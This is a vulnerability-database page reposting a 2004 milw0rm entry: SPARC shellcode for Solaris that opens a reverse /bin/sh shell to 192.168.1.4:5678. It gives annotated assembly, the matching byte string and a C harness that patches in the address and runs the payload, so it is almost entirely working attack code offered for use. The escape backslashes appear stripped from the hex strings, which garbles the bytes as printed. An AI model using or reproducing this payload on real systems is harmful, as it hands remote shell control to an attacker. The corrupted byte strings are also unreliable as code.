Solaris/SPARC – Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)
漏洞ID | 1054637 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Solaris_SPARC | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* Solaris shellcode - connects /bin/sh to a host
*
* Claes M. Nyberg 20020624
* <[email protected]>, <[email protected]>
*/
#include <string.h>
/***********************************************************
void
main(void)
{
__asm__("
! Create socket
mov 0x2, %o0 ! o0 = AF_INET
mov 0x2, %o1 ! o1 = SOCK_STREAM
xor %o2, %o2, %o2 ! o2 = 0
mov 0xe6, %g1 ! g1 = 230 = SYS_so_socket
ta 8 ! socket(AF_INET, SOCK_STREAM, 0);
add %o0, 0x1, %l0 ! l0 = socket_fd +1
! Server address
mov 0xc0, %l1 ! 192
sll %l1, 0x8, %l1 ! 192.0
or 0xa8, %l1, %l1 ! 192.168
sll %l1, 0x8, %l1 ! 192.168.0
or 0x1, %l1, %l1 ! 192.168.1
sll %l1, 0x8, %l1 ! 192.168.1.0
or 0x1, %l1, %l1 ! 192.168.1.1
st %l1, [%sp - 12] ! Server IP
mov 0x2, %l1 ! AF_INET
sth %l1, [%sp -16] ! Server family
mov 0x30, %l1 ! High order byte of Port
sll %l1, 0x8, %l1 ! <<
or 0x39, %l1, %l1 ! Low order byte of port
sth %l1, [%sp - 14] ! Server port
! Connect
sub %sp, 16, %o1 ! o1 = &server
mov 0x10, %o2 ! o2 = 16 = sizeof(struct sockaddr_in)
mov 0xeb, %g1 ! g1 = 235 = SYS_connect
ta 8 ! connect(socket_fd, &server, 16);
! Set up IO
sub %l0, 0x1, %o0 ! o0 = socket_fd
mov 0x9, %o1 ! o1 = F_DUP2FD
xor %o2, %o2, %o2 ! o2 = 0 = STDIN_FILENO
mov 0x3e, %g1 ! g1 = 62 = SYS_fcntl
ta 8 ! fcntl(socket_fd, F_DUP2FD, STDIN_FILENO);
sub %l0, 0x1, %o0 ! o0 = socket_fd
mov 0x1, %o2 ! o2 = 1 = STDOUT_FILENO
ta 8 ! fcntl(socket_fd, F_DUP2FD, STDOUT_FILENO);
sub %l0, 0x1, %o0 ! o0 = socket_fd
mov 0x2, %o2 ! o2 = 1 = STDERR_FILENO
ta 8 ! fcntl(socket_fd, F_DUP2FD, STDERR_FILENO);
! Execve /bin/sh
xor %o2, %o2, %o2 ! o2 = 0 => envp = NULL
set 0x2f62696e, %l0 ! lo = '/bin'
set 0x2f2f7368, %l1 ! l1 = '//sh'
st %o2, [%sp - 4] ! String ends with NULL
st %l1, [%sp - 8] ! Write //sh to stack
st %l0, [%sp - 12] ! Write /bin to stack
sub %sp, 12, %o0 ! o0 = &string
st %o2, [%sp - 16] ! argv[1] = NULL
st %o0, [%sp - 20] ! argv[0] = &string
sub %sp, 20, %o1 ! o1 = &string
mov 0x3b, %g1 ! g1 = 59 = SYS_execve
ta 8 ! execve(argv[0], argv, NULL);
! Exit
mov 1, %g1 ! g1 = 1 = SYS_exit
ta 8 ! exit();
");
}
***********************************************************/
/* Index of low order byte in IP address */
#define IP0 51
#define IP1 43
#define IP2 35
#define IP3 27
/* Index of low order byte in port */
#define P0 75
#define P1 67
static char solaris_code[] =
/* Create socket */
"x90x10x20x02" /* mov 2, %o0 */
"x92x10x20x02" /* mov 2, %o1 */
"x94x1ax80x0a" /* xor %o2, %o2, %o2 */
"x82x10x20xe6" /* mov 230, %g1 */
"x91xd0x20x08" /* ta 0x8 */
"xa0x02x20x01" /* add %o0, 1, %l0 */
/* Server address */
"xa2x10x20xc0" /* mov 192, %l1 */
"xa3x2cx60x08" /* sll %l1, 8, %l1 */
"xa2x14x60xa8" /* or %l1, 168, %l1 */
"xa3x2cx60x08" /* sll %l1, 8, %l1 */
"xa2x14x60x01" /* or %l1, 1, %l1 */
"xa3x2cx60x08" /* sll %l1, 8, %l1 */
"xa2x14x60x01" /* or %l1, 1, %l1 */
"xe2x23xbfxf4" /* st %l1, [%sp - 12] */
"xa2x10x20x02" /* mov 2, %l1 */
"xe2x33xbfxf0" /* sth %l1, [%sp - 16] */
"xa2x10x20x30" /* mov 48, %l1 */
"xa3x2cx60x08" /* sll %l1, 8, %l1 */
"xa2x14x60x39" /* or %l1, 57, %l1 */
"xe2x33xbfxf2" /* sth %l1, [%sp - 14] */
/* Connect */
"x92x23xa0x10" /* sub %sp, 16, %o1 */
"x94x10x20x10" /* mov 16, %o2 */
"x82x10x20xeb" /* mov 235, %g1 */
"x91xd0x20x08" /* ta 0x8 */
/* Set up IO */
"x90x24x20x01" /* sub %l0, 1, %o0 */
"x92x10x20x09" /* mov 9, %o1 */
"x94x1ax80x0a" /* xor %o2, %o2, %o2 */
"x82x10x20x3e" /* mov 62, %g1 */
"x91xd0x20x08" /* ta 0x8 */
"x90x24x20x01" /* sub %l0, 1, %o0 */
"x94x10x20x01" /* mov 1, %o2 */
"x91xd0x20x08" /* ta 0x8 */
"x90x24x20x01" /* sub %l0, 1, %o0 */
"x94x10x20x02" /* mov 2, %o2 */
"x91xd0x20x08" /* ta 0x8 */
/* Execve /bin/sh */
"x94x1ax80x0a" /* xor %o2, %o2, %o2 */
"x21x0bxd8x9a" /* sethi %hi(0x2f626800), %l0 */
"xa0x14x21x6e" /* or %l0, 0x16e, %l0 */
"x23x0bxcbxdc" /* sethi %hi(0x2f2f7000), %l1 */
"xa2x14x63x68" /* or %l1, 0x368, %l1 */
"xd4x23xbfxfc" /* st %o2, [%sp - 4] */
"xe2x23xbfxf8" /* st %l1, [%sp - 8] */
"xe0x23xbfxf4" /* st %l0, [%sp - 12] */
"x90x23xa0x0c" /* sub %sp, 12, %o0 */
"xd4x23xbfxf0" /* st %o2, [%sp - 16] */
"xd0x23xbfxec" /* st %o0, [%sp - 20] */
"x92x23xa0x14" /* sub %sp, 20, %o1 */
"x82x10x20x3b" /* mov 59, %g1 */
"x91xd0x20x08" /* ta 0x8 */
/* Exit */
"x82x10x20x01" /* mov 1, %g1 */
"x91xd0x20x08"; /* ta 0x8 */
static char _solaris_code[] =
"x90x10x20x02x92x10x20x02x94x1ax80x0ax82x10x20xe6"
"x91xd0x20x08xa0x02x20x01xa2x10x20xc0xa3x2cx60x08"
"xa2x14x60xa8xa3x2cx60x08xa2x14x60x01xa3x2cx60x08"
"xa2x14x60x01xe2x23xbfxf4xa2x10x20x02xe2x33xbfxf0"
"xa2x10x20x30xa3x2cx60x08xa2x14x60x39xe2x33xbfxf2"
"x92x23xa0x10x94x10x20x10x82x10x20xebx91xd0x20x08"
"x90x24x20x01x92x10x20x09x94x1ax80x0ax82x10x20x3e"
"x91xd0x20x08x90x24x20x01x94x10x20x01x91xd0x20x08"
"x90x24x20x01x94x10x20x02x91xd0x20x08x94x1ax80x0a"
"x21x0bxd8x9axa0x14x21x6ex23x0bxcbxdcxa2x14x63x68"
"xd4x23xbfxfcxe2x23xbfxf8xe0x23xbfxf4x90x23xa0x0c"
"xd4x23xbfxf0xd0x23xbfxecx92x23xa0x14x82x10x20x3b"
"x91xd0x20x08x82x10x20x01x91xd0x20x08";
int
main(void)
{
void (*code)() = (void *)_solaris_code;
_solaris_code[IP0] = 4;
_solaris_code[IP1] = 1;
_solaris_code[IP2] = 168;
_solaris_code[IP3] = 192;
_solaris_code[P0] = 0x2e;
_solaris_code[P1] = 0x16;
printf("Shellcode length: %dn", strlen(_solaris_code));
/* Connect to 192.168.1.4:5678 */
code();
return(1);
}
// milw0rm.com [2004-09-26]
相关推荐: Netscape JavaScript Cache Browsing Vulnerability
Netscape JavaScript Cache Browsing Vulnerability 漏洞ID 1104871 漏洞类型 Access Validation Error 发布时间 1998-09-29 更新时间 1998-09-29 CVE编号 N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666